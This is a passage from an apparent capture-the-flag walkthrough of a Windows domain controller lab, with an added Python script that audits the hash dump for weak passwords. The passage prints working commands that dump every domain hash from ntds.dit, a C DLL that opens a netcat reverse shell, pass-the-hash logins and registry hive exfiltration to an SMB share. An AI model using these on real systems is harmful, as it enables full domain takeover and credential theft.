		- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
		- Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %xyz% X:
-> %xyz% = {51decf05-558f-4eed-8412-a92b47a180e1}
The shadow copy was successfully exposed as X:\.
->
PS C:\ProgramData>

With the upload function included in evil-winrm we can upload a pair of DLLs that help exploit this privilege, and then import them as modules.

PS C:\ProgramData> upload SeBackupPrivilegeUtils.dll

Info: Uploading SeBackupPrivilegeUtils.dll to C:\ProgramData\SeBackupPrivilegeUtils.dll  

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

PS C:\ProgramData> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading SeBackupPrivilegeCmdLets.dll to C:\ProgramData\SeBackupPrivilegeCmdLets.dll  

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

PS C:\ProgramData> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\ProgramData> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\ProgramData>

Now we copy ntds.dit, which contains the hashes of every domain user, and SYSTEM out of the shadow copy, accessing them through the X: drive.

PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\NTDS\ntds.dit ntds.dit
PS C:\ProgramData> Copy-FileSeBackupPrivilege X:\Windows\System32\Config\SYSTEM SYSTEM  
PS C:\ProgramData>

We can connect with impacket's smbclient, use the C$ share, enter the ProgramData folder where our files are and download them with get.

❯ impacket-smbclient blackfield.local/svc_backup@dc01.blackfield.local -hashes :9658d1d1dcd9250115e2205d9f48400d  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use C$
# cd ProgramData
# get ntds.dit
# get SYSTEM
#

Now, locally, with impacket's secretsdump we pass the SYSTEM hive and the ntds.dit we downloaded and dump all the domain hashes.

❯ impacket-secretsdump LOCAL -system SYSTEM -ntds ntds.dit
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
...........................................................................................................  
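The same dump is what a defender runs (from a legitimate backup, with DSRM or Domain Admin rights) to audit password hygiene: accounts sharing an NT hash share a password, the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is an empty password, and an LM hash other than aad3b435b51404eeaad3b435b51404ee means LM hashes are still being stored. The added example below (not part of the original writeup) runs those checks over the ten lines shown above; only the sample text is taken from the page.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "" : LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# secretsdump line: domain\name or name, RID, LM hash, NT hash, then ":::"
_LINE_RE = re.compile(
    r"^(?P<name>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::"
)


def parse_secretsdump(text):
    """Return a list of {name, rid, lm, nt} dicts for every hash line in the output."""
    rows = []
    for line in text.splitlines():
        m = _LINE_RE.match(line.strip())
        if m:
            rows.append({"name": m.group("name"), "rid": int(m.group("rid")),
                         "lm": m.group("lm"), "nt": m.group("nt")})
    return rows


def audit_dump(rows):
    """Group accounts by NT hash and report reused, blank and LM-backed passwords."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["name"])
    shared = {h: sorted(names) for h, names in by_nt.items()
              if len(names) > 1 and h != EMPTY_NT}
    blank = sorted(r["name"] for r in rows if r["nt"] == EMPTY_NT)
    lm_present = sorted(r["name"] for r in rows if r["lm"] != EMPTY_LM)
    return {"shared_nt": shared, "blank_password": blank, "lm_hash_present": lm_present}


# The ten hash lines from the secretsdump output above (raw string: names contain backslashes)
SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD189208:1107:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD404458:1108:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
"""

if __name__ == "__main__":
    report = audit_dump(parse_secretsdump(SAMPLE_DUMP))
    for nt, names in report["shared_nt"].items():
        print("NT %s shared by %d accounts: %s" % (nt, len(names), ", ".join(names)))
    print("blank passwords:", report["blank_password"])
    print("LM hashes present:", report["lm_hash_present"])
```

On the lines above the four BLACKFIELD* accounts share one hash, Guest (disabled by default) has the blank-password hash, and no LM hashes are stored. Note that the dump contains the krbtgt hash, so any legitimate use of secretsdump must treat the output as domain-compromising material and rotate krbtgt twice if it ever leaks.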

Checking the Administrator NT hash with crackmapexec returns Pwn3d!

❯ crackmapexec smb blackfield.local -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\Administrator:184fb5e5178480be64824d4cd53b99ee (Pwn3d!)

Since it is valid, we can simply connect with the NT hash using evil-winrm to get a shell as Administrator and read the flag.

❯ evil-winrm -i blackfield.local -u Administrator -H 184fb5e5178480be64824d4cd53b99ee  
PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
437**************************5cb
PS C:\Users\Administrator\Documents>


Extra 1 - Administrator


If we look in BloodHound at the groups svc_backup belongs to, the most interesting one is the domain-level Backup Operators group.

There are different ways to exploit it; we start by uploading the usual netcat.exe.

PS C:\Users\svc_backup\Documents> upload netcat.exe C:\ProgramData  

Info: Uploading netcat.exe to C:\ProgramData\netcat.exe

Data: 60360 bytes of 60360 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

Now, with a C program built as a DLL, we can make the loading process call WinExec on the netcat.exe we uploaded, so that it sends a shell back to our host.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Runs the uploaded netcat through cmd.exe; SW_HIDE (0) keeps the window hidden.
int pwn() {
    WinExec("C:\\Windows\\System32\\cmd.exe /c C:\\ProgramData\\netcat.exe 10.10.14.10 443 -e powershell", 0);
    return 0;
}

// Entry point called by the loader; the payload fires once, when the DLL is mapped.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void)hModule;
    (void)lpReserved;
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            pwn();
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }

    return TRUE;
}

Using x86_64-w64-mingw32-gcc we can compile the C source as a DLL.

❯ x86_64-w64-mingw32-gcc code.c -shared -o WindowsCoreDeviceInfo.dll  

We create a dll directory and upload the malicious DLL we built into it.

PS C:\Users\svc_backup\Documents> mkdir dll

    Directory: C:\Users\svc_backup\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/27/2023   4:40 AM                dll

PS C:\Users\svc_backup\Documents> upload WindowsCoreDeviceInfo.dll dll

Info: Uploading WindowsCoreDeviceInfo.dll to C:\Users\svc_backup\Documents\dll\WindowsCoreDeviceInfo.dll  

Data: 114012 bytes of 114012 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

Using robocopy in backup mode (/b) we can take advantage of the privilege and copy the DLL inside the dll directory into C:\Windows\System32, alongside the rest of the system DLLs.

PS C:\Users\svc_backup\Documents> robocopy /b dll C:\Windows\System32

-------------------------------------------------------------------------------  
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------  

  Started : Monday, June 26, 2023 12:32:20 AM
   Source : C:\Users\svc_backup\Documents\dll\
     Dest : C:\Windows\System32\

    Files : *.*

  Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

	                   1	C:\Users\svc_backup\Documents\dll\
	*EXTRA Dir        -1	C:\Windows\System32\0409\
	*EXTRA Dir        -1	C:\Windows\System32\ADDSDeployment_Internal\
	*EXTRA Dir        -1	C:\Windows\System32\adprep\
..............................................................................
	  *EXTRA File 		  143360	xwtpw32.dll
	  *EXTRA File 		   79872	zipcontainer.dll
	  *EXTRA File 		  429568	zipfldr.dll
	  *EXTRA File 		   30720	ztrace_maps.dll
	    New File  		   85511	WindowsCoreDeviceInfo.dll
  0%
 76%
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0       127
   Files :         1         1         0         0         0      3969
   Bytes :    83.5 k    83.5 k         0         0         0   1.734 g
   Times :   0:00:08   0:00:00                       0:00:00   0:00:08
   Ended : Monday, June 26, 2023 12:32:28 AM

PS C:\Users\svc_backup\Documents>

We also upload UsoDllLoader, which will make the DLLs, including ours, get loaded.

PS C:\Users\svc_backup\Documents> upload UsoDllLoader.exe

Info: Uploading UsoDllLoader.exe to C:\Users\svc_backup\Documents\UsoDllLoader.exe  

Data: 192512 bytes of 192512 bytes copied

Info: Upload successful!

PS C:\Users\svc_backup\Documents>

When we run the exe it loads the DLLs; although it prints multiple errors, we can ignore them, since this is not really the use the tool was designed for.

PS C:\Users\svc_backup\Documents> .\UsoDllLoader.exe
[*] Using UpdateOrchestrator->StartScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartScan'... Done.
[-] Unable to connect to server!
[*] Retrying with UpdateOrchestrator->StartInteractiveScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartInteractiveScan'... Done.
[-] Unable to connect to server!
[*] Retrying with UpdateOrchestrator->StartDownload()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.  
    |__ Creating a new Update Session... Done.
    |__ Calling 'StartInteractiveScan'... Done.
[-] Unable to connect to server!
[-] Exploit failed.
PS C:\Users\svc_backup\Documents>

When the malicious DLL is loaded it runs netcat.exe and sends us a PowerShell as nt authority\system, which has the highest privileges on DC01.

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.192 
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>


Extra 2 - Administrator


Another way is through reg, but first we start an SMB server to receive all the files we will back up, such as the SAM.

❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0  
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Using reg we can take a backup and save it to our SMB share; this gives us copies of the SAM, SYSTEM and SECURITY hives as .save files.

❯ impacket-reg blackfield.local/svc_backup@dc01.blackfield.local -hashes :9658d1d1dcd9250115e2205d9f48400d backup -o '\\10.10.14.10\kali'  
Impacket v0.11.0 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Hoping it is started...
[*] Saved HKLM\SAM to \\10.10.14.10\kali\SAM.save
[*] Saved HKLM\SYSTEM to \\10.10.14.10\kali\SYSTEM.save
[*] Saved HKLM\SECURITY to \\10.10.14.10\kali\SECURITY.save

We can use secretsdump locally to dump the hashes and credentials in the SAM and SECURITY hives; doing so we find a default password in clear text.

❯ impacket-secretsdump LOCAL -system SYSTEM.save -sam SAM.save -security SECURITY.save  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:302a067192e8e4dc10fabe54626803b5319e31023aaa7e7464e6fba9de267088012ceebefcb638d6e8d4eeb5545fb0c886a0262f5f848d19eb8de1b62bd053a008d5c6e1339eb1725249d770253b3695babbd7414562c1d67c1c9eefde69e023e7bd1f360ff02b3acbb3420a28d903ad2eeae6840084d1361329c04607812ede6af5e98e89d12d42dd57957fc03137e3090463b32fc973c25d8a5f539d2acb33e5e8bb4afc8c5958020d4e98293876678167f74dfa8b0f76096b53e197d9cd7823dcf3c43ad58e029ef0b81becb8c08602778a594fe4195594ffde490afbb8a6764bcdedae3348b37d548eb9652e2a74  
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:34886c51472e3da678f41f124d3fd2cc
[*] DefaultPassword 
(Unknown User):###_ADM1N_3920_###
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
[*] NL$KM 
 0000   88 01 B2 05 DB 70 7A 0F  EF 52 DF 06 96 76 4C A4   .....pz..R...vL.
 0010   BD 6E 62 D1 06 63 1A 7E  31 2F A2 6D F8 6C 42 50   .nb..c.~1/.m.lBP
 0020   FC 8D 5C A4 FC 46 1B DC  7E CA 7E 76 7F 5E C2 74   ..\..F..~.~v.^.t
 0030   CF EB B6 1F 99 8A 29 CF  2C D1 1D 55 C6 01 2E 6F   ......).,..U...o
NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f
[*] Cleaning up...

This clear-text password belongs to the Administrator user; checking it with crackmapexec at domain level returns Pwn3d!

❯ crackmapexec smb blackfield.local -u Administrator -p ###_ADM1N_3920_###
SMB         blackfield.local 445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)  
SMB         blackfield.local 445    DC01             [+] BLACKFIELD.local\Administrator:###_ADM1N_3920_### (Pwn3d!)

We can simply connect with evil-winrm as Administrator and read the flag.

❯ evil-winrm -i blackfield.local -u Administrator -p ###_ADM1N_3920_###  
PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
437**************************5cb
PS C:\Users\Administrator\Documents>